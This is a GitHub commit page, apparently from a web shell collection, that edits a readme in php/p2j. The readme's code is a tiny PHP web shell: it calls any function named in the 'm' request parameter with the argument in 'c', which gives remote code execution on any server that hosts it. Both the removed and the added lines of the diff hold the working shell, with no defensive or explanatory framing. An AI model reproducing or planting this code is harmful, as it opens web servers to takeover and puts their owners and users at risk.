Skip to content

Commit

Permalink
update readme.md
Browse files Browse the repository at this point in the history
  • Loading branch information
tennc committed Jul 28, 2014
1 parent 635d59b commit fd8b66c
Showing 1 changed file with 2 additions and 5 deletions.
7 changes: 2 additions & 5 deletions php/p2j/Readme.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,12 +6,9 @@
***************************************************
code:

<?php
<p>
<p><?php
$func = new ReflectionFunction($_GET[m]);
<p>
echo $func->invokeArgs(array($_GET[c]));
<p>
?>
?></p>

***************************************************

0 comments on commit fd8b66c

Please sign in to comment.